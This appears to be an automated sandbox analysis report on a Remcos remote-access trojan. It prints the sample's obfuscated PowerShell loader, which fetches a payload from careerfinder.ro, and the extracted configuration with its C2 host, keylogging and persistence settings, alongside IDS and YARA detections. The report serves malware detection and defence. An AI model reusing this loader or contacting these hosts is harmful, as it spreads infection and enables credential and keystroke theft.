                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. dskHLegieVoldaSpild iljeBetwrU absPlod[ ata$KlisSPaatpPreva

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 6764, TargetFilename: C:\ProgramData\remcos\logs.dat

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-16T13:08:16.357207+020020365941Malware Command and Control Activity Detected192.168.2.54988794.198.96.16553848TCP
                2024-10-16T13:08:18.336471+020020365941Malware Command and Control Activity Detected192.168.2.54989494.198.96.16553848TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-16T13:08:17.984442+020028033043Unknown Traffic192.168.2.549895178.237.33.5080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000008.00000003.2572731984.0000000007739000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "iniiivan.duckdns.org:53848:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-G9FJB6", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000008.00000002.3285922374.000000000329F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2572731984.0000000007739000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3293007161.0000000007712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2628002795.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3293007161.0000000007728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.2% probability
                Source: unknownHTTPS traffic detected: 185.248.196.6:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.248.196.6:443 -> 192.168.2.5:49870 version: TLS 1.2
                Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2390118940.0000000007FC0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32A source: powershell.exe, 00000005.00000002.2376551918.0000000006F61000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .Core.pdbB source: powershell.exe, 00000005.00000002.2376551918.0000000006F61000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdbF source: powershell.exe, 00000005.00000002.2376551918.0000000006F61000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,LdrInitializeThunk,FindFirstFileW,FindNextFileW,FindClose,8_2_234B10F1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,8_2_234B6580
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407898
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49887 -> 94.198.96.165:53848
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49894 -> 94.198.96.165:53848
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: iniiivan.duckdns.org
                Uses dynamic DNS services
                Source: unknownDNS query: name: iniiivan.duckdns.org
                Source: global trafficTCP traffic: 192.168.2.5:49887 -> 94.198.96.165:53848
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: ASSEFLOWAmsterdamInternetExchangeAMS-IXIT ASSEFLOWAmsterdamInternetExchangeAMS-IXIT
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49895 -> 178.237.33.50:80
                Source: global trafficHTTP traffic detected: GET /vn/Traurigheder.sea HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: careerfinder.roConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /vn/Traurigheder.sea HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: careerfinder.roConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /rs/wQpkVl14.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: careerfinder.roCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: msiexec.exe, 00000008.00000002.3305869425.0000000023480000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: msiexec.exe, 0000000D.00000003.2626119936.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginVivaldi equals www.facebook.com (Facebook)
                Source: msiexec.exe, 0000000D.00000003.2626119936.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginVivaldi equals www.yahoo.com (Yahoo)
                Source: msiexec.exe, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: msiexec.exe, 00000008.00000002.3306498912.0000000023CF0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: msiexec.exe, 00000008.00000002.3306498912.0000000023CF0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: careerfinder.ro
                Source: global trafficDNS traffic detected: DNS query: iniiivan.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000002.00000002.2148055608.0000024101D9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://careerfinder.ro
                Source: msiexec.exe, 00000008.00000003.2628002795.000000000773B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3293007161.0000000007712000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3293007161.00000000076D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                Source: powershell.exe, 00000002.00000002.2175598804.0000024110071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000005.00000002.2362758455.0000000004527000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.2148055608.0000024100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2362758455.00000000043D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.2362758455.0000000004527000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: msiexec.exe, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: msiexec.exe, msiexec.exe, 00000010.00000002.2598283322.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2597717153.0000000000B1D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2597755288.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000003.2597734505.0000000000B1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: msiexec.exe, 00000010.00000002.2598283322.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2597717153.0000000000B1D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2597755288.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2597734505.0000000000B1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
                Source: msiexec.exe, 00000008.00000002.3305869425.0000000023480000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: msiexec.exe, 00000008.00000002.3305869425.0000000023480000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: powershell.exe, 00000002.00000002.2184487775.000002417A384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                Source: msiexec.exe, 0000000D.00000002.2626896117.0000000000C2F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: bhv792D.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                Source: bhv792D.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                Source: bhv792D.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                Source: powershell.exe, 00000002.00000002.2148055608.0000024100001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.2362758455.00000000043D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000002.00000002.2148055608.000002410022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2148055608.0000024101614000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://careerfinder.ro
                Source: msiexec.exe, 00000008.00000002.3293007161.0000000007712000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://careerfinder.ro/
                Source: msiexec.exe, 00000008.00000002.3304833813.0000000022FC0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3293007161.00000000076D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://careerfinder.ro/rs/wQpkVl14.bin
                Source: msiexec.exe, 00000008.00000002.3293007161.00000000076D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://careerfinder.ro/rs/wQpkVl14.bini
                Source: powershell.exe, 00000002.00000002.2148055608.000002410022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://careerfinder.ro/vn/Traurigheder.seaP
                Source: powershell.exe, 00000005.00000002.2362758455.0000000004527000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://careerfinder.ro/vn/Traurigheder.seaXR
                Source: powershell.exe, 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000005.00000002.2362758455.0000000004527000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.2148055608.0000024100C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: msiexec.exe, 0000000D.00000003.2615654429.0000000004A31000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2615901380.0000000004A35000.00000004.00000020.00020000.00000000.sdmp, bhv792D.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: msiexec.exe, 0000000D.00000003.2615654429.0000000004A31000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2615901380.0000000004A35000.00000004.00000020.00020000.00000000.sdmp, bhv792D.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: msiexec.exe, 0000000D.00000003.2626119936.000000000306A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2615654429.0000000004A31000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2615901380.0000000004A35000.00000004.00000020.00020000.00000000.sdmp, bhv792D.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: powershell.exe, 00000002.00000002.2175598804.0000024110071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: msiexec.exe, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownHTTPS traffic detected: 185.248.196.6:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.248.196.6:443 -> 192.168.2.5:49870 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Installs a global keyboard hook
                Source: C:\Windows\SysWOW64\msiexec.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0041183A OpenClipboard,GetLastError,13_2_0041183A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040987A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004098E2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_00406DFC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_00406E9F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_004068B5
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_004072B5

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000008.00000002.3285922374.000000000329F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2572731984.0000000007739000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3293007161.0000000007712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2628002795.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3293007161.0000000007728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: amsi32_6504.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6504, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00401806 NtdllDefWindowProc_W,13_2_00401806
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004018C0 NtdllDefWindowProc_W,13_2_004018C0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004016FD NtdllDefWindowProc_A,14_2_004016FD
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004017B7 NtdllDefWindowProc_A,14_2_004017B7
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00402CAC NtdllDefWindowProc_A,16_2_00402CAC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00402D66 NtdllDefWindowProc_A,16_2_00402D66
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E8B2762_2_00007FF848E8B276
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E8C0222_2_00007FF848E8C022
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234BB5C18_2_234BB5C1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234C71948_2_234C7194
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044B04013_2_0044B040
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0043610D13_2_0043610D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044731013_2_00447310
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044A49013_2_0044A490
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040755A13_2_0040755A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0043C56013_2_0043C560
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044B61013_2_0044B610
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044D6C013_2_0044D6C0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004476F013_2_004476F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044B87013_2_0044B870
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044081D13_2_0044081D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0041495713_2_00414957
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004079EE13_2_004079EE
